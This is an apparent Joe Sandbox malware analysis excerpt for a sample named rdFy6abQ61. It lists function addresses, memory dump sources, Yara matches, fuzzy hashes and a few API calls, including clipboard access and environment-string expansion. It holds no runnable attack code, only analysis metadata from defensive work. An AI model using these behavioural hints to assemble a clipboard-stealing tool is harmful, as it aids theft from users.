                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                              • Instruction ID: b0168b037b63377ee53a696943b9184fc20a9d47a10823b489a3532680c59eb7
                                                                              • Opcode Fuzzy Hash: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                              • Instruction Fuzzy Hash: 7B314B2290D6F30EC336892D449047E7AA05AE621472943FFDCF19B3C3C52AC94587E5
                                                                              Function 020E8587 Relevance: .1, Instructions: 107COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                              • Instruction ID: a920a13015bba8c89f3679bedf1200f8fc8a5fb8cc7e8e167f9f0c9c995580ad
                                                                              • Opcode Fuzzy Hash: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                              • Instruction Fuzzy Hash: A8312B6250D6F20ECB37892D449007DBAE059A611871E83FEDCF28B7D3C611C985D3E1
                                                                              Function 00402B40 Relevance: .1, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
                                                                              • Instruction ID: ac5a2fd1a34d00fe81212d9a0dd75a5008a32a6ff7d51fa23ef38769660ba55c
                                                                              • Opcode Fuzzy Hash: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
                                                                              • Instruction Fuzzy Hash: 392129B971A1A10BD700DF399DD412B77A2D7C730671F4577DA80D3392C27AE80AC225
                                                                              Function 020E2DA7 Relevance: .1, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
                                                                              • Instruction ID: f7777d61bd290f687ecdaec13fb0f3a9bec885f99b29ab736816e905a371b5f9
                                                                              • Opcode Fuzzy Hash: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
                                                                              • Instruction Fuzzy Hash: B521F2A972A2B10FCB00DF399CD012AB7E697C720675B8576DE82C3312C236D84AD221
                                                                              Function 0041B3F2 Relevance: .1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                                              • Instruction ID: f625d5dc7cc146dca826755e11d0e3d06b3d9b76c6b30af6ca5c7fe59dabf8e9
                                                                              • Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                                              • Instruction Fuzzy Hash: 2C31F2766183418BD708CF39C89136BBBE2AB86318F18CA6DE4D1D7384D73C88458B92
                                                                              Function 020FB659 Relevance: .1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                                              • Instruction ID: 27dd1a5319b153adaea54c6c506fbe7cfd38c0fe84188b5e08dc7471a6ebbe9f
                                                                              • Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                                              • Instruction Fuzzy Hash: 9D31E4766583418BD718CF39C89136BBBE2AB86318F18CA6DE4D1D7284D73CC405CB52
                                                                              Function 00430F03 Relevance: .1, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
                                                                              • Instruction ID: 4d6f8d4a3a0c9291bd82fbf102df9c74bb0e146b1c020dae9dd1e6f681f2a276
                                                                              • Opcode Fuzzy Hash: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
                                                                              • Instruction Fuzzy Hash: D921E1369583A04BE3348F359C913DBBBE2ABC6314F09872DC8D817285DB7A1805CBC6
                                                                              Function 0043A230 Relevance: .1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                              • Instruction ID: 34218d49f98f4d04757d6d7688404ab739ac49d953720a668d3546879b641f63
                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                              • Instruction Fuzzy Hash: 7411EC336491D40EC7158D3C8400566BF930A97735F1993DAF4F4973D2D52B8D8E835A
                                                                              Function 0042C5E0 Relevance: .1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                                                              • Instruction ID: e2b1fa06f32b2fd48b90287ee0e38661db697dc0127cfdde8b5722762f88e760
                                                                              • Opcode Fuzzy Hash: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                                                              • Instruction Fuzzy Hash: 440192F170171197DA209E15A5C172BB2A85F90708F18543ED84457342EB7DEC08C2DD
                                                                              Function 0210C847 Relevance: .1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ac742f35869d0ed4235e03d9c95948d21c80b525ab38d32b7d308f9413da626c
                                                                              • Instruction ID: 3fcfc28ea947c380bfae22392bc82e73eaf8ae6db758c2c9418c9698c3294411
                                                                              • Opcode Fuzzy Hash: ac742f35869d0ed4235e03d9c95948d21c80b525ab38d32b7d308f9413da626c
                                                                              • Instruction Fuzzy Hash: 340184F1A403014BEB30AE5484C0B37B2A9AF91714F18423FD81A5B680DBB6E805EFDD
                                                                              Function 005E0083 Relevance: .1, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                              • Instruction ID: a9a0a0c95a67b29a6cfaf3c5a1f33241982da01ead28eeff0186a4601e7a8a0c
                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                              • Instruction Fuzzy Hash: A511A0723401009FDB48DE56DCC5FA677EAFB88320B698065ED44CB352D6B5EC42C760
                                                                              Function 020F5527 Relevance: .1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ddbd00ec1fbfda298244a4535371ea7b35dd49cf87d54f7bde964ae8a89d22a9
                                                                              • Instruction ID: 7297e2c1c8ca5707c74ee85bf7ea82c9fb502f206df055b7b5de896d2aa3c3cd
                                                                              • Opcode Fuzzy Hash: ddbd00ec1fbfda298244a4535371ea7b35dd49cf87d54f7bde964ae8a89d22a9
                                                                              • Instruction Fuzzy Hash: 7A01FD74354201CBC3998F299C60A3A77E2FB46718BA52428E241A7DA0D730E822EE09
                                                                              Function 00440A90 Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 88e438cc32f6b5a12cb4a8709c5ccb5f2cf69f7e5815e22606a40b63f7bc33cd
                                                                              • Instruction ID: 7b6863c9c9260bd0558c6f806dd5f9e3415f7290086a878cc0b8c3271b95cfd7
                                                                              • Opcode Fuzzy Hash: 88e438cc32f6b5a12cb4a8709c5ccb5f2cf69f7e5815e22606a40b63f7bc33cd
                                                                              • Instruction Fuzzy Hash: 6EF0F936544304ABE1105B459C40D3777AEFB9E728F104319F715332A1E772ED2197A9
                                                                              Function 02120CF7 Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b742c9dc481357075cde75226765a26651ce40b82d6343e18e23e0a7f9609d23
                                                                              • Instruction ID: 3b13b3b6c9c9543e4019fd010628538ca55bfeb6b618503a1c9bd61d5fcaab66
                                                                              • Opcode Fuzzy Hash: b742c9dc481357075cde75226765a26651ce40b82d6343e18e23e0a7f9609d23
                                                                              • Instruction Fuzzy Hash: 30F0D63654022CAF92204B05AC40D3777AEFB9E768F100318F91812161E323BD259BA5
                                                                              Function 020E0D90 Relevance: .0, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                              • Instruction ID: 8e504f509ed45cf5556c00acb79dae34d19aa5139cc1525b24397d22501afbfa
                                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                              • Instruction Fuzzy Hash: CC01A276A107048FDF22DF24C804BAE33E6EB86316F4544B5D90BE7281E7B4A9818F90
                                                                              Function 020F5202 Relevance: .0, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 298ad0f31f07e6cbc3fafda3465d78227824978fe87ca002a14543de39e85b0e
                                                                              • Instruction ID: dae4dfdc5778bcbffaebd236296ccfb8e3e78089ad125c02560ee3e989635fd5
                                                                              • Opcode Fuzzy Hash: 298ad0f31f07e6cbc3fafda3465d78227824978fe87ca002a14543de39e85b0e
                                                                              • Instruction Fuzzy Hash: 73F0B43AA5D7504EE3448EE8D48436BFBD2EB82304F19947DC6C4A7581CAB998858B92
                                                                              Function 020E275E Relevance: .0, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e90889bea583965d5caf57eaac281fb9adadddb4774545dd124efcdbcc5e77d5
                                                                              • Instruction ID: 0d89408a3703e1d86e052ef1c9cb124491236f91d677c8ed111f18bcd505f781
                                                                              • Opcode Fuzzy Hash: e90889bea583965d5caf57eaac281fb9adadddb4774545dd124efcdbcc5e77d5
                                                                              • Instruction Fuzzy Hash: 2FF05C625093404F8F140E5988D03B8F7AF5A97205709A56DD8E347199C631C5C9E758
                                                                              Function 020F921E Relevance: .0, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 171e36fd424bda3a0986d43e2945777b52d37d187c2806a166bc1c3e11cd69f4
                                                                              • Instruction ID: bdc97e79ed4c64fe7b4337018c5d5afb3d0764b7fc63173f746532ff771e2e9d
                                                                              • Opcode Fuzzy Hash: 171e36fd424bda3a0986d43e2945777b52d37d187c2806a166bc1c3e11cd69f4
                                                                              • Instruction Fuzzy Hash: A2F08CB1A0034AEFCFA19F44C841AA7BBF5FF8A350F044456F9858B620E735C961EB56
                                                                              Function 0041F3E0 Relevance: .0, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                              • Instruction ID: 65b04920acd8ec40befbc16cdab85cd19ddd64fc0dfac740f80379ed40623b4a
                                                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                              • Instruction Fuzzy Hash: 7CD0A7715487B50E57588D3C44A04BBFBE8E987712B1814AFE8D6E3206D225DC47469D
                                                                              Function 020FF647 Relevance: .0, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                              • Instruction ID: b2f5d5b2cfed0b3c47af36710f88d35b280b31919eb13d375dbd18238a2c13e8
                                                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                              • Instruction Fuzzy Hash: A3D097205883A20E47C98E3804A0837FBE4E943112B0C108EE0D1E3854C321D801925C
                                                                              Function 02108EB2 Relevance: .0, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1cb6986d49f719985d39046bb9c9820c9f7ea8fbe7571d132dc76052a6f0b540
                                                                              • Instruction ID: ad7c06e57a303dba94bcd7d2aa197efc7e92ac1f9ab750114ca6719ae142e1d8
                                                                              • Opcode Fuzzy Hash: 1cb6986d49f719985d39046bb9c9820c9f7ea8fbe7571d132dc76052a6f0b540
                                                                              • Instruction Fuzzy Hash: 77B048389482409B9604CF00E88042AF375AA8B200F14A418E84933310CA30E8008A89
                                                                              Function 02117CC7 Relevance: 9.1, APIs: 6, Instructions: 119clipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                              • String ID:
                                                                              • API String ID: 1006321803-0
                                                                              • Opcode ID: b6f01c0c97fb55c4f760d8dbc247883c75a3a53b097895858b7026296001245f
                                                                              • Instruction ID: d5fd30a66b299d6b619e8f1469cbcd71c3d57ee9091a4ca07cac04df3418fc68
                                                                              • Opcode Fuzzy Hash: b6f01c0c97fb55c4f760d8dbc247883c75a3a53b097895858b7026296001245f
                                                                              • Instruction Fuzzy Hash: 28417C7114C3858FD300EF78944836EBFE1AB82314F19493DE4D68A381D7798589DB63
                                                                              Function 00425560 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042561D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: $%$p:#$MO
                                                                              • API String ID: 237503144-3521940197
                                                                              • Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                              • Instruction ID: 81944db62257c61826c9772faf3d9c506449667b4075365b7c5b7f4bc0eeec7d
                                                                              • Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                              • Instruction Fuzzy Hash: 6141DF365183448FE310CF24C88475FBBE2FFC5758F16892CE4D49B680D6B9CA0A8B86
                                                                              Function 021057C7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 02105884
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: $%$p:#$MO
                                                                              • API String ID: 237503144-3521940197
                                                                              • Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                              • Instruction ID: d6c69211a3bec9f93f8a4255ac183c7ed910f9a4b3778b379394254aea9daedb
                                                                              • Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                              • Instruction Fuzzy Hash: 7241CE765583448BE310CF25C88475FBBE2FBC5758F16892CE4D49B680C7B9CA0A8B86